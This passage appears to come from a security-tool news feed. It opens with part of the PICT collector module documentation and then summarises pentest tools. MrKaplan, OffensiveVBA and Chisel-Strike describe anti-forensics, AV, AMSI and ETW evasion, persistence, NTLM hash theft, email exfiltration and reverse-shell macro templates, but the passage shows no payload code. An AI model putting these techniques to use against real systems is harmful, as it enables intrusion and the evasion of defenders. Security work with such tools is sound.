This dictionary specifies module-specific settings. Not all modules have their own settings, but if a module does allow for its own settings, you can provide them here. In the above example, you can see a boolean setting named collectArtifacts being used with the browser module.

There are also global module settings that are maintained by the Collector class, and that can be set individually for each module.

collectArtifacts specifies whether to collect the file artifacts that would normally be collected by the module. If false, all artifacts will be omitted for that module. This may be needed in cases where storage space is a consideration, and the collected artifacts are large, or in cases where the collected artifacts may represent a privacy issue for the user whose system is being analyzed.

Writing your own modules

Modules must consist of a file containing a class that is subclassed from Collector (defined in collectors/collector.py), and they must be placed in the collectors folder. A new Collector module can be easily created by duplicating the collectors/template.py file and customizing it for your own use.

def __init__(self, collectionPath, allUsers)

This method can be overridden if necessary, but the super Collector.__init__() must be called in such a case, preferably before your custom code executes. This gives the object the chance to get its properties set up before your code tries to use them.

def printStartInfo(self)

This is a very simple method that will be called when this module's collection begins. Its intent is to print a message to stdout to give the user a sense of progress, by providing feedback about what is happening.

def applySettings(self, settingsDict)

This gives the module the chance to apply any custom settings. Each module can have its own self-defined settings, but the settingsDict should also be passed to the super, so that the Collection class can handle any settings that it defines.

def collect(self)

This method is the core of the module. This is called when it is time for the module to begin collection. It can write as many files as it needs to, but should confine this activity to files within the path self.collectionPath, and should use filenames that are not already taken by other modules.

If you wish to collect artifacts, don't try to do this on your own. Simply add paths to the self.pathsToCollect array, and the Collector class will take care of copying those into the appropriate subpaths in the artifacts folder, and maintaining the metadata (permissions, extended attributes, flags, etc) on the artifacts.

When the method finishes, be sure to call the super (Collector.collect(self)) to give the Collector class the chance to handle its responsibilities, such as collecting artifacts.

Your collect method can use any data collected in the basic_info.txt or lsregister.txt files found at self.collectionPath. These are collected at the beginning by the pict.py script, and can be assumed to be available for use by any other modules. However, you should not rely on output from any other modules, as there is no guarantee that the files will be available when your module runs. Modules may not run in the order they appear in your configuration JSON, since Python dictionaries are unordered.
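Putting these pieces together, below is a minimal sketch of a custom module, assuming a hypothetical collectors/example.py that would be referenced in the configuration as "example": "ExampleCollector". The method names follow the descriptions above; the exact base-class API may differ, so treat it as an illustration rather than a drop-in module.

# collectors/example.py -- minimal illustrative sketch of a custom PICT module.
# The import path follows the layout described above (collectors/collector.py);
# in practice, start from collectors/template.py and adjust as needed.
import os

from collectors.collector import Collector


class ExampleCollector(Collector):
    def __init__(self, collectionPath, allUsers):
        # Let the base class set up its properties before our code uses them.
        super().__init__(collectionPath, allUsers)
        self.includeHosts = True  # hypothetical module-specific setting

    def printStartInfo(self):
        # Give the user a sense of progress.
        print("Collecting example data...")

    def applySettings(self, settingsDict):
        # Apply our own settings, then pass the dict to the super so the
        # global settings (e.g. collectArtifacts) are handled as well.
        self.includeHosts = settingsDict.get("includeHosts", True)
        super().applySettings(settingsDict)

    def collect(self):
        # Write summary output under self.collectionPath, using a filename
        # no other module uses.
        summaryPath = os.path.join(self.collectionPath, "example_summary.txt")
        with open(summaryPath, "w") as out:
            out.write("example summary data\n")

        # Ask the Collector class to copy file artifacts and keep their metadata.
        if self.includeHosts:
            self.pathsToCollect.append("/etc/hosts")

        # Give the Collector class the chance to handle its responsibilities.
        Collector.collect(self)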

Credits

Thanks to Greg Neagle for FoundationPlist.py, which solved lots of problems with reading binary plists, plists containing date data types, etc.



BlackStone - Pentesting Reporting Tool

By: Zion3R
7 August 2022 at 12:30

Pentesting Reporting Tool (1)


The BlackStone project, or "BlackStone Project", is a tool created to automate the work of drafting and submitting reports on ethical hacking or pentesting audits.

In this tool we can register in the database the vulnerabilities that we find during the audit, classifying them as internal, external or WiFi audit findings; in addition, we can add a description and recommendation, as well as the severity level and the effort required for correction. This information will then help us generate a criticality table in the report as a global summary of the vulnerabilities found.

We can also register a company and, just by adding its web page, the tool will be able to find subdomains, telephone numbers, social networks, employee emails...


Pentesting Reporting Tool (2)

Docker Install

Install Docker

Install docker-compose
Install BlackStone
git clone https://github.com/micro-joan/BlackStone
cd BlackStone
docker-compose up -d

User: blackstone

Password: blackstone

Manual Install

  • First we must download an Apache server to host the tool, in my case I use Mamp (I recommend following these steps): https://www.mamp.info/en/downloads/
  • We will download the content of this repository and we will have 2 folders (BlackStone and BBDD)
  • Once the server starts we will go to c://MAMP/htdocs and paste all the contents of the downloaded folder "BlackStone"
  • For the application to work we will have to import the database: go to your browser and open "localhost/phpMyAdmin/"; the database connection file is in the folder BlackStone/conexion.php
  • We will create a database called blackstone and import the data from the downloaded BBDD folder
  • Log in to BlackStone with the username and password "blackstone"

Use

First you need to go to profile settings and add Hunter.io and haveibeenpwned.com tokens:

Pentesting Reporting Tool (3)

After having vulnerabilities in the database, we will go to the audited client section and register a client along with their web page. Once registered, we can go to customer details and see the following information:

THIS APPLICATION IS INTENDED FOR PROFESSIONAL USE ONLY; THE AUTHOR IS NOT RESPONSIBLE FOR ANY MISUSE.

  • Name of business owner
  • Social networks of the company owner
  • Email and telephone number of the owner of the company
  • Exposed password check on the company owner's deep web
  • Subdomains of the website as well as information of interest found in google
  • Emails of company workers

Pentesting Reporting Tool (4)

Once we have the company that we are going to audit registered in the database, we will create a report, adding the date, the name of the report and the company to be audited. When we register the report, we will click edit and then select the vulnerabilities that we want to appear in the report:

Pentesting Reporting Tool (5)

Finally, we will generate the report by clicking on the "overview report" button. We then save the generated page as ".mht" and open it with Word to be able to work on the generated report:

Pentesting Reporting Tool (6)



Smap - A Drop-In Replacement For Nmap Powered By Shodan.Io

By: Zion3R
8 August 2022 at 12:30


Smap is a replica of Nmap which uses shodan.io's free API for port scanning. It takes the same command line arguments as Nmap and produces the same output, which makes it a drop-in replacement for Nmap.


Features

  • Scans 200 hosts per second
  • Doesn't require any account/api key
  • Vulnerability detection
  • Supports all nmap's output formats
  • Service and version fingerprinting
  • Makes no contact with the targets

Installation

Binaries

You can download a pre-built binary from here and use it right away.

Manual

go install -v github.com/s0md3v/smap/cmd/smap@latest

Confused or something not working? For more detailed instructions, click here

AUR package

Smap is available on AUR as smap-git (builds from source) and smap-bin (pre-built binary).

Homebrew/Mac

Smap is also available on Homebrew.

brew update
brew install smap

Usage

Smap takes the same arguments as Nmap but options other than -p, -h, -o*, -iL are ignored. If you are unfamiliar with Nmap, here's how to use Smap.

Specifying targets

smap 127.0.0.1 127.0.0.2

You can also use a list of targets, separated by newlines.

smap -iL targets.txt

Supported formats

1.1.1.1         // IPv4 address
example.com // hostname
178.23.56.0/8 // CIDR

Output

Smap supports 6 output formats which can be used with the -o* options as follows

smap example.com -oX output.xml

If you want to print the output to the terminal, use a hyphen (-) as the filename.

Supported formats

oX    // nmap's xml format
oG // nmap's greppable format
oN // nmap's default format
oA // output in all 3 formats above at once
oP // IP:PORT pairs separated by newlines
oS // custom smap format
oJ // json

Note: Since Nmap doesn't scan/display vulnerabilities and tags, that data is not available in nmap's formats. Use -oS to view that info.

Specifying ports

Smap scans these 1237 ports by default. If you want to display results for certain ports, use the -p option.

smap -p21-30,80,443 -iL targets.txt

Considerations

Since Smap simply fetches existing port data from shodan.io, it is super fast, but there's more to it. You should use Smap if:

You want

  • vulnerability detection
  • a super fast port scanner
  • results for most common ports (top 1237)
  • no connections to be made to the targets

You are okay with

  • not being able to scan IPv6 addresses
  • results being up to 7 days old
  • a few false negatives


MrKaplan - Tool Aimed To Help Red Teamers To Stay Hidden By Clearing Evidence Of Execution

By: Zion3R
9 August 2022 at 12:30


MrKaplan is a tool aimed to help red teamers stay hidden by clearing evidence of execution. It works by saving information such as the time it ran, taking snapshots of files, and associating each piece of evidence with the related user.

This tool is inspired by MoonWalk, a similar tool for Unix machines.

You can read more about it in the wiki page.


Features

  • Stopping event logging.
  • Clearing files artifacts.
  • Clearing registry artifacts.
  • Can run for multiple users.
  • Can run as user and as admin (Highly recommended to run as admin).
  • Can save timestamps of files.
  • Can exclude certain operations and leave artifacts to blue teams.

Usage

  • Before you start your operations on the computer, run MrKaplan with the begin flag, and whenever you finish, run it again with the end flag.
  • DO NOT REMOVE MrKaplan registry key, otherwise MrKaplan will not be able to use the information.

IOCs

  • PowerShell process that accesses the artifacts mentioned in the wiki page.

  • PowerShell importing a weird base64 blob.

  • PowerShell process that performs Token Manipulation.

  • MrKaplan's registry key: HKCU:\Software\MrKaplan.

Acknowledgements

Disclaimer

I'm not responsible in any way for any kind of damage done to your computer / program as a result of this project. I happily accept contributions; make a pull request and I will review it!



Packj - Large-Scale Security Analysis Platform To Detect Malicious/Risky Open-Source Packages

By: Zion3R
10 August 2022 at 12:30


Packj (pronounced package) is a command line (CLI) tool to vet open-source software packages for "risky" attributes that make them vulnerable to supply chain attacks. This is the tool behind our large-scale security analysis platform Packj.dev that continuously vets packages and provides free reports.


How to use

Packj accepts two input args:

  • name of the registry or package manager, pypi, npm, or rubygems.
  • name of the package to be vetted

Packj supports vetting of PyPI, NPM, and RubyGems packages. It performs static code analysis and checks for several metadata attributes such as release timestamps, author email, downloads, dependencies. Packages with expired email domains, large release time gap, sensitive APIs, etc. are flagged as risky for security reasons.

Packj also analyzes public repo code as well as metadata (e.g., stars, forks). By comparing the repo description and package title, you can verify that the package has indeed been created from the repo, mitigating starjacking attacks.

Containerized

The best way to use Packj is to run it inside Docker (or Podman) container. You can pull our latest image from DockerHub to get started.

docker pull ossillate/packj:latest

$ docker run --mount type=bind,source=/tmp,target=/tmp ossillate/packj:latest npm browserify
[+] Fetching 'browserify' from npm...OK [ver 17.0.0]
[+] Checking version...ALERT [598 days old]
[+] Checking release history...OK [484 version(s)]
[+] Checking release time gap...OK [68 days since last release]
[+] Checking author...OK [[email protected]]
[+] Checking email/domain validity...ALERT [expired author email domain]
[+] Checking readme...OK [26838 bytes]
[+] Checking homepage...OK [https://github.com/browserify/browserify#readme]
[+] Checking downloads...OK [2.2M weekly]
[+] Checking repo_url URL...OK [https://github.com/browserify/browserify]
[+] Checking repo data...OK [stars: 14077, forks: 1236]
[+] Checking repo activity...OK [commits: 2290, contributors: 207, tags: 413]
[+] Checking for CVEs...OK [none found]
[+] Checking dependencies...ALERT [48 found]
[+] Downloading package 'browserify' (ver 17.0.0) from npm...OK [163.83 KB]
[+] Analyzing code...ALERT [needs 3 perms: process,file,codegen]
[+] Checking files/funcs...OK [429 files (383 .js), 744 funcs, LoC: 9.7K]
=============================================
[+] 5 risk(s) found, package is undesirable!
=> Complete report: /tmp/npm-browserify-17.0.0.json
{
"undesirable": [
"old package: 598 days old",
"invalid or no author email: expired author email domain",
"generates new code at runtime",
"reads files and dirs",
"forks or exits OS processes",
]
}

Specific package versions to be vetted can be specified using ==. Please refer to the example below.

$ docker run --mount type=bind,source=/tmp,target=/tmp ossillate/packj:latest pypi requests==2.18.4
[+] Fetching 'requests' from pypi...OK [ver 2.18.4]
[+] Checking version...ALERT [1750 days old]
[+] Checking release history...OK [142 version(s)]
[+] Checking release time gap...OK [14 days since last release]
[+] Checking author...OK [[email protected]]
[+] Checking email/domain validity...OK [[email protected]]
[+] Checking readme...OK [49006 bytes]
[+] Checking homepage...OK [http://python-requests.org]
[+] Checking downloads...OK [50M weekly]
[+] Checking repo_url URL...OK [https://github.com/psf/requests]
[+] Checking repo data...OK [stars: 47547, forks: 8758]
[+] Checking repo activity...OK [commits: 6112, contributors: 725, tags: 144]
[+] Checking for CVEs...ALERT [2 found]
[+] Checking dependencies...OK [9 direct]
[+] Downloading package 'requests' (ver 2.18.4) from pypi...OK [123.27 KB]
[+] Analyzing code...ALERT [needs 4 perms: codegen,process,file,network]
[+] Checking files/funcs...OK [47 files (33 .py), 578 funcs, LoC: 13.9K]
=============================================
[+] 6 risk(s) found, package is undesirable, vulnerable!
{
"undesirable": [
"old package: 1744 days old",
"invalid or no homepage: insecure webpage",
"generates new code at runtime",
"fetches data over the network",
"reads files and dirs",
],
"vulnerable": [
"contains CVE-2018-18074,CVE-2018-18074"
]
}
=> Complete report: /tmp/pypi-requests-2.18.4.json
=> View pre-vetted package report at https://packj.dev/package/PyPi/requests/2.18.4

Non-containerized

Alternatively, you can install Python/Ruby dependencies locally and test it.

NOTE

  • Packj has only been tested on Linux.
  • Requires Python3 and Ruby. API analysis will fail if used with Python2.
  • You will have to install Python and Ruby dependencies before using the tool:
    • pip install -r requirements.txt
    • gem install google-protobuf:3.21.2 rubocop:1.31.1
$ python3 main.py npm eslint
[+] Fetching 'eslint' from npm...OK [ver 8.16.0]
[+] Checking version...OK [10 days old]
[+] Checking release history...OK [305 version(s)]
[+] Checking release time gap...OK [15 days since last release]
[+] Checking author...OK [[email protected]]
[+] Checking email/domain validity...OK [[email protected]]
[+] Checking readme...OK [18234 bytes]
[+] Checking homepage...OK [https://eslint.org]
[+] Checking downloads...OK [23.8M weekly]
[+] Checking repo_url URL...OK [https://github.com/eslint/eslint]
[+] Checking repo data...OK [stars: 20669, forks: 3689]
[+] Checking repo activity...OK [commits: 8447, contributors: 1013, tags: 302]
[+] Checking for CVEs...OK [none found]
[+] Checking dependencies...ALERT [35 found]
[+] Downloading package 'eslint' (ver 8.16.0) from npm...OK [490.14 KB]
[+] Analyzing code...ALERT [needs 2 perms: codegen,file]
[+] Checking files/funcs...OK [395 files (390 .js), 1022 funcs, LoC: 76.3K]
=============================================
[+] 2 risk(s) found, package is undesirable!
{
"undesirable": [
"generates new code at runtime",
"reads files and dirs: ['package/lib/cli-engine/load-rules.js:37', 'package/lib/cli-engine/file-enumerator.js:142']"
]
}
=> Complete report: /tmp/npm-eslint-8.16.0.json

How it works

  • It first downloads the metadata from the registry using their APIs and analyzes it for "risky" attributes.
  • To perform API analysis, the package is downloaded from the registry using their APIs into a temp dir. Then, packj performs static code analysis to detect API usage. API analysis is based on MalOSS, a research project from our group at Georgia Tech.
  • Vulnerabilities (CVEs) are checked by pulling info from the OSV database; a minimal lookup sketch follows this list
  • Python PyPI and NPM package downloads are fetched from pypistats and npmjs
  • All risks detected are aggregated and reported
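As a rough illustration of the CVE lookup step above (illustrative only, not Packj's actual code), the sketch below queries the public OSV v1 query API for a specific package version; the package name and version are just examples.

# Minimal sketch of an OSV vulnerability lookup, similar in spirit to the
# CVE check described above (illustrative only, not Packj's implementation).
import json
import urllib.request


def osv_vulns(ecosystem, name, version):
    """Return the list of OSV vulnerability records for a package version."""
    query = {
        "version": version,
        "package": {"name": name, "ecosystem": ecosystem},
    }
    req = urllib.request.Request(
        "https://api.osv.dev/v1/query",
        data=json.dumps(query).encode(),
        headers={"Content-Type": "application/json"},
    )
    with urllib.request.urlopen(req) as resp:
        return json.load(resp).get("vulns", [])


if __name__ == "__main__":
    # Example: the same requests==2.18.4 package vetted above.
    for vuln in osv_vulns("PyPI", "requests", "2.18.4"):
        print(vuln["id"], vuln.get("summary", ""))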

Risky attributes

The design of Packj is guided by our study of 651 malware samples of documented open-source software supply chain attacks. Specifically, we have empirically identified a number of risky code and metadata attributes that make a package vulnerable to supply chain attacks.

For instance, we flag inactive or unmaintained packages that no longer receive security fixes. Inspired by Android app runtime permissions, Packj uses a permission-based security model to offer control and code transparency to developers. Packages that invoke sensitive operating system functionality such as file accesses and remote network communication are flagged as risky as this functionality could leak sensitive data.

Some of the attributes we vet for, include

Each attribute below is listed with its type (metadata or code), what we check, and the reason it is considered risky:

  • Release date (metadata): version release date, to flag old or abandoned packages. Old or unmaintained packages do not receive security fixes.
  • OS or lang APIs (code): use of sensitive APIs, such as exec and eval. Malware uses APIs from the operating system or language runtime to perform sensitive operations (e.g., read SSH keys).
  • Contributors' email (metadata): email addresses of the contributors. Incorrect or invalid email addresses suggest lack of 2FA.
  • Source repo (metadata): presence and validity of a public source repo. Absence of a public repo means no easy way to audit or review the source code publicly.

The full list of the attributes we track can be viewed at threats.csv

These attributes have been identified as risky by several other researchers [1, 2, 3] as well.

How to customize

Packj has been developed with a goal to assist developers in identifying and reviewing potential supply chain risks in packages.

However, since the degree of perceived security risk from an untrusted package depends on the specific security requirements, Packj can be customized according to your threat model. For instance, a package with no 2FA may be perceived to pose greater security risks to some developers, compared to others who may be more willing to use such packages for the functionality offered. Given the volatile nature of the problem, providing customized and granular risk measurement is one of our goals.

Packj can be customized to minimize noise and reduce alert fatigue by simply commenting out unwanted attributes in threats.csv

Malware found

We found over 40 malicious packages on PyPI using this tool. A number of them have been taken down. Refer to an example below:

$ python3 main.py pypi krisqian
[+] Fetching 'krisqian' from pypi...OK [ver 0.0.7]
[+] Checking version...OK [256 days old]
[+] Checking release history...OK [7 version(s)]
[+] Checking release time gap...OK [1 days since last release]
[+] Checking author...OK [[email protected]]
[+] Checking email/domain validity...OK [[email protected]]
[+] Checking readme...ALERT [no readme]
[+] Checking homepage...OK [https://www.bilibili.com/bangumi/media/md140632]
[+] Checking downloads...OK [13 weekly]
[+] Checking repo_url URL...OK [None]
[+] Checking for CVEs...OK [none found]
[+] Checking dependencies...OK [none found]
[+] Downloading package 'KrisQian' (ver 0.0.7) from pypi...OK [1.94 KB]
[+] Analyzing code...ALERT [needs 3 perms: process,network,file]
[+] Checking files/funcs...OK [9 files (2 .py), 6 funcs, LoC: 184]
=============================================
[+] 6 risk(s) found, package is undesirable!
{
"undesirable": [
"no readme",
"only 45 weekly downloads",
"no source repo found",
"generates new code at runtime",
"fetches data over the network: ['KrisQian-0.0.7/setup.py:40', 'KrisQian-0.0.7/setup.py:50']",
"reads files and dirs: ['KrisQian-0.0.7/setup.py:59', 'KrisQian-0.0.7/setup.py:70']"
]
}
=> Complete report: pypi-KrisQian-0.0.7.json
=> View pre-vetted package report at https://packj.dev/package/PyPi/KrisQian/0.0.7

Packj flagged KrisQian (v0.0.7) as suspicious due to absence of source repo and use of sensitive APIs (network, code generation) during package installation time (in setup.py). We decided to take a deeper look, and found the package malicious. Please find our detailed analysis at https://packj.dev/malware/krisqian.

More examples of malware we found are listed at https://packj.dev/malware. Please reach out to us at [email protected] for the full list.

Resources

To learn more about the Packj tool or open-source software supply chain attacks, refer to our resources below.


Upcoming talks

Feature roadmap

  • Add support for other language ecosystems. Rust is a work in progress, and will be available in the last week of July '22.
  • Add functionality to detect several other "risky" code as well as metadata attributes.
  • Packj currently only performs static code analysis; we are working on adding support for dynamic analysis (WIP, ETA: end of summer)

Team

Packj has been developed by Cybersecurity researchers at Ossillate Inc. and external collaborators to help developers mitigate risks of supply chain attacks when sourcing untrusted third-party open-source software dependencies. We thank our developers and collaborators.

We welcome code contributions. Join our discord community for discussion and feature requests.

FAQ

  • What Package Managers (Registries) are supported?

Packj can currently vet NPM, PyPI, and RubyGems packages for "risky" attributes. We are adding support for Rust.

  • Does it work on obfuscated calls? For example, a base 64 encrypted string that gets decrypted and then passed to a shell?

This is a very common malicious behavior. Packj detects code obfuscation as well as the spawning of shell commands (exec system call). For example, Packj can flag use of the getattr() and eval() APIs as they indicate "runtime code generation"; a developer can then go and take a deeper look. See main.py for details.

  • Does this work at the system call level, where it would detect e.g. any attempt to open ~/.aws/credentials, or does it rely on heuristic analysis of the code itself, which will always be able to be "coded around" by the malware authors?

Packj currently uses static code analysis to derive permissions (e.g., file/network accesses). Therefore, it can detect open() calls if used by the malware directly (e.g., not obfuscated in a base64 encoded string). But, Packj can also point out such base64 decode calls. Fortunately, malware has to use these APIs (read, open, decode, eval, etc.) for its functionality -- there's no getting around it. Having said that, a sophisticated malware can hide itself better, so dynamic analysis must be performed for completeness. We are incorporating strace-based dynamic analysis (containerized) to collect system calls. See roadmap for details.



Kali Linux 2022.3 - Penetration Testing and Ethical Hacking Linux Distribution

By: Zion3R
11 August 2022 at 06:08

Time for another Kali Linux release! – Kali Linux 2022.3. This release has various impressive updates.

The highlights of Kali's 2022.3 release:

For more details, see the bug tracker changelog.


More info here.


Faraday Community - Open Source Penetration Testing and Vulnerability Management Platform

By: Zion3R
11 August 2022 at 12:30


Faraday was built from within the security community, to make vulnerability management easier and enhance our work. What IDEs are to programming, Faraday is to pentesting.

Offensive security had two difficult tasks: designing smart ways of getting new information, and keeping track of findings to improve further work.

This new update brings: New scanning, reporting and UI experience


Focus on pentesting

Get your work organized and focus on what you do best. With Faraday Community, you may focus on pentesting while we help you with the rest.

Check out the documentation here.

Installation

The easiest way to get Faraday up and running is using our docker-compose:

# Docker-compose

$ wget https://raw.githubusercontent.com/infobyte/faraday/master/docker-compose.yaml

$ docker-compose up

Manage your findings

Manage, classify and triage your results through Faraday's dashboard, designed with and for pentesters.

Get an overview of your vulnerabilities and ease your work.




By right clicking on any vulnerability, you may filter, tag and classify your results with ease. You may also add comments to vulnerabilities and add evidence with just a few clicks.



In the asset tab, information on each asset is presented, for a detailed follow-up on every device in your network. This insight might be especially useful if you hold critical data on certain assets, so the impact of vulnerabilities may be assessed through this information. If responsibilities over each asset are clear, this view helps to organize and follow the work of asset owners too.

Here, you can obtain information about the OS, services, ports and vulnerabilities associated with each of your assets, which will give you a better understanding of your scope and help you to gain an overview of what you are assessing.




Use your favorite tools

Integrate scanners with Faraday Agents Dispatcher. This feature allows you to orchestrate the most commonly used security tools and have everything available from your Faraday instance. Once your scan is finished, you will be able to see all the results in the main dashboard.


Choose the scanners that best fit your needs.



Share your results

Once you're done, export your results in CSV format.

Check out some of our features

Full centralization

With Faraday, you may oversee your cybersecurity efforts, prioritize actions and manage your resources from a single platform.

Elegant integration of scanning tools

Make sense of today's overwhelming number of tools. Faraday's technology aligns 80+ key plugins with your current needs, normalizing and deduplicating vulnerabilities.

Powerful Automation

Save time by automating pivotal steps of Vulnerability Management. Scan, create reports, and schedule pipelines of custom actions, all following your requirements.

Intuitive dashboard

Faraday's intuitive dashboard guides teams through vulnerability management with ease. Scan, analyze, automate, tag, and prioritize, each with just a few clicks.

Smart visibility

Get full visibility of your security posture in real-time. Advanced filters, navigation, and analytics help you strategize and focus your work.

Easier teamwork

Coordinate efforts by sending tickets to Jira, Gitlab, and ServiceNow directly from Faraday.

Planning ahead

Manage your security team with Faraday planner. Keep up by communicating with your peers and receiving notifications.

Work as usual, but better

Get your work organized on the run when pentesting with Faraday CLI.

Proudly Open Source

We believe in the power of teams; most of our integrations and core technologies are open source, allowing any team to build custom implementations and integrations.

For more information check out our website www.faradaysec.com


OffensiveVBA - Code Execution And AV Evasion Methods For Macros In Office Documents

By: Zion3R
12 August 2022 at 12:30


In preparation for a VBS AV evasion stream/video I was doing some research on Office macro code execution methods and evasion techniques.

The list got longer and longer and I found no central place for offensive VBA templates - so this repo can be used for that. It is far from complete. If you know any other cool technique or useful template, feel free to contribute and create a pull request!

Most of the templates in this repo were already published somewhere. I just copy-pasted most templates from ms-docs sites, blog posts or from other tools.


Templates in this repo

File Description
ShellApplication_ShellExecute.vba Execute an OS command via ShellApplication object and ShellExecute method
ShellApplication_ShellExecute_privileged.vba Execute a privileged OS command via ShellApplication object and ShellExecute method - UAC prompt
Shellcode_CreateThread.vba Execute shellcode in the current process via Win32 CreateThread
Shellcode_EnumChildWindowsCallback.vba Execute shellcode in the current process via EnumChildWindows
Win32_CreateProcess.vba Create a new process for code execution via Win32 CreateProcess function
Win32_ShellExecute.vba Create a new process for code execution via Win32 ShellExecute function
WMI_Process_Create.vba Create a new process via WMI for code execution
WMI_Process_Create2.vba Another WMI code execution example
WscriptShell_Exec.vba Execute an OS command via WscriptShell object and Exec method
WscriptShell_run.vba Execute an OS command via WscriptShell object and Run method
VBA-RunPE @itm4n's RunPE technique in VBA
GadgetToJScript med0x2e's C# script for generating .NET serialized gadgets that can trigger .NET assembly load/execution when deserialized using BinaryFormatter from JS/VBS/VBA based scripts.
PPID_Spoof.vba christophetd's spoofing-office-macro copy
AMSIBypass_AmsiScanBuffer_ordinal.vba rmdavy's AMSI Bypass to patch AmsiScanBuffer using ordinal values for a signature bypass
AMSIBypass_AmsiScanBuffer_Classic.vba rasta-mouse's classic AmsiScanBuffer patch
AMSIBypass_Heap.vba rmdavy's HeapsOfFun repo copy
AMSIbypasses.vba outflanknl's AMSI bypass blog
COMHijack_DLL_Load.vba Load DLL via COM Hijacking
COM_Process_create.vba Create process via COM object
Download_Autostart.vba Download a file from a remote webserver and put it into the StartUp folder
Download_Autostart_WinAPI.vba Download a file from a remote webserver via URLDownloadtoFileA and put it into the StartUp folder
Dropper_Autostart.vba Drop batch file into the StartUp folder
Registry_Persist_wmi.vba Create StartUp registry key for persistence via WMI
Registry_Persist_wscript.vba Create StartUp registry key for persistence via wscript object
ScheduledTask_Create.vba Create and start a scheduled task for code execution/persistence
XMLDOM_Load_XSL_Process_create.vba Load XSL from a remote webserver to execute code
regsvr32_sct_DownloadExecute.vba Execute regsvr32 to download a remote webserver's SCT file for code execution
BlockETW.vba Patch EtwEventWrite in ntdll.dll to block ETW data collection
BlockETW_COMPLUS_ETWEnabled_ENV.vba Block ETW data collection by setting the environment variable COMPLUS_ETWEnabled to 0, credit to @xpn
ShellWindows_Process_create.vba ShellWindows Process create to get explorer.exe as parent process
AES.vba An example to use AES encryption/decryption in VBA from Here
Dropper_Executable_Autostart.vba Get executable bytes from VBA and drop into Autostart - no download in this case
MarauderDrop.vba Drop a COM registered .NET DLL into temp, import the function and execute code - in this case loads a remote C# binary from a webserver to memory and executes it - credit to @Jean_Maes_1994 for MaraudersMap
Dropper_Workfolders_lolbas_Execute.vba Drop an embedded executable into the TEMP directory and execute it using C:\windows\system32\Workfolders.exe as LOLBAS - credit to @YoSignals
SandBoxEvasion Some SandBox Evasion templates
Evasion Dropper Autostart.vba Drops a file to the Startup directory bypassing file write monitoring via renamed folder operation
Evasion MsiInstallProduct.vba Installs a remote MSI package using WindowsInstaller ActiveXObject avoiding spawning suspicious office child process, the msi installation will be executed as a child of the MSIEXEC /V service
StealNetNTLMv2.vba Steal NetNTLMv2 Hash via share connection - credit to https://book.hacktricks.xyz/windows/ntlm/places-to-steal-ntlm-creds
Parse-Outlook.vba Parses Outlook for sensitive keywords and file extensions, and exfils them via email - credit to JohnWoodman
Reverse-Shell.vba Reverse shell written entirely in VBA using Windows API calls - credit to JohnWoodman

Missing - ToDos

File Description
Unhooker.vba Unhook APIs in memory to get rid of hooks
Syscalls.vba Syscall usage - fresh from disk or Syswhispers like
Manymore.vba If you have any more ideas feel free to contribute

Obfuscators / Payload generators

  1. VBad
  2. wePWNise
  3. VisualBasicObfuscator - needs some modification as it doesn't split up lines and is therefore not usable for office document macros
  4. macro_pack
  5. shellcode2vbscript.py
  6. EvilClippy
  7. OfficePurge
  8. SharpShooter
  9. VBS-Obfuscator-in-Python - needs some modification as it doesn't split up lines and is therefore not usable for office document macros

Credits / useful resources

ASR bypass: http://blog.sevagas.com/IMG/pdf/bypass_windows_defender_attack_surface_reduction.pdf

Shellcode to VBScript conversion: https://github.com/DidierStevens/DidierStevensSuite/blob/master/shellcode2vbscript.py

Bypass AMSI in VBA: https://outflank.nl/blog/2019/04/17/bypassing-amsi-for-vba/

VBA purging: https://www.mandiant.com/resources/purgalicious-vba-macro-obfuscation-with-vba-purging

F-Secure VBA Evasion and detection post: https://blog.f-secure.com/dechaining-macros-and-evading-edr/

One more F-Secure blog: https://labs.f-secure.com/archive/dll-tricks-with-vba-to-improve-offensive-macro-capability/



NimGetSyscallStub - Get Fresh Syscalls From A Fresh Ntdll.Dll Copy

By: Zion3R
13 August 2022 at 12:30


Get fresh Syscalls from a fresh ntdll.dll copy. This code can be used as an alternative to the already published awesome tools NimlineWhispers and NimlineWhispers2 by @ajpc500 or ParallelNimcalls.


The advantage of grabbing syscalls dynamically is that the signature of the stubs is not included in the file and you don't have to worry about changing Windows versions.

To compile the shellcode execution template run the following:

nim c -d:release ShellcodeInject.nim

The result should look like this:



Chisel-Strike - A .NET XOR Encrypted Cobalt Strike Aggressor Implementation For Chisel To Utilize Faster Proxy And Advanced Socks5 Capabilities

By: Zion3R
14 August 2022 at 12:30


A .NET XOR encrypted cobalt strike aggressor implementation for chisel to utilize faster proxy and advanced socks5 capabilities.


Why write this?

In my experience I found socks4/socks4a proxies quite slow in comparison to their socks5 counterparts, and most C2 frameworks lack a socks5 implementation. There is a C# wrapper around the go version of chisel called SharpChisel. This wrapper has a few issues and isn't maintained to the latest version of chisel. It didn't allow using shellcode with donut, reflection methods or execute-assembly. I found a fix for this using the SharpChisel-NG project.

Since the SharpChisel assembly is around 16.7 MB, execute-assembly (which has a hidden size limitation of 1 MB) and similar in-memory methods wouldn't work. To maintain most of the execution in memory I incorporated the NetLoader project by Flangvik, which is executed via execute-assembly to reflectively host and load a XOR encrypted version of SharpChisel with base64 arguments in memory.

As an alternative, it is also possible to implement similar C# proxies like SharpSocks by replacing the appropriate chisel binaries in the project.

Setup

Note: If using a Windows teamserver skip steps 2 and 3.

  1. Clone/download the repository: git clone https://github.com/m3rcer/Chisel-Strike.git

  2. Make all binaries executable:

  • cd Chisel-Strike

  • chmod +x -R chisel-modules

  • chmod +x -R tools

  3. Install Mingw-w64 and mono:
  • sudo apt-get install mingw-w64

  • sudo apt install mono-complete

  4. Import ChiselStrike.cna in cobalt strike using the Script Manager

Recompile binaries from the src folder if needed.

Usage

chisel can be executed on both the teamserver (windows/linux) and the beacon, with either acting as the server/client. A normal execution flow would be to set up a chisel server on the teamserver and create a client on the beacon connecting back to the teamserver.

Commands

  1. chisel <client/server> <command>: Run Chisel on a beacon

  2. chisel-tms <client/server> <command>: Run Chisel on your teamserver

  3. chisel-enc: XOR Encrypt SharpChisel.exe with a password of choice

  4. chisel-jobs: List active chisel jobs on the teamserver and beacon

  5. chisel-kill: Kill active chisel jobs on a beacon

  6. chisel-tms-kill: Kill active chisel jobs on teamserver

Example

OPSEC

NetLoader can easily be obfuscated and used to bypass defender using projects like NimCrypt2 and the like.

Yet SharpChisel.exe drops a DLL on disk due to the use of Costura/Fody packages, at a location similar to C:\Users\m3rcer\AppData\Local\Temp\Costura\CB9433C24E75EC539BF34CD1AA12B236\64\main.dll, which is detected by defender. It is advised to obfuscate the chisel DLLs using projects like gobfuscate in the SharpChisel-NG project and re-build new SharpChisel-NG binaries as shown here.

TODO

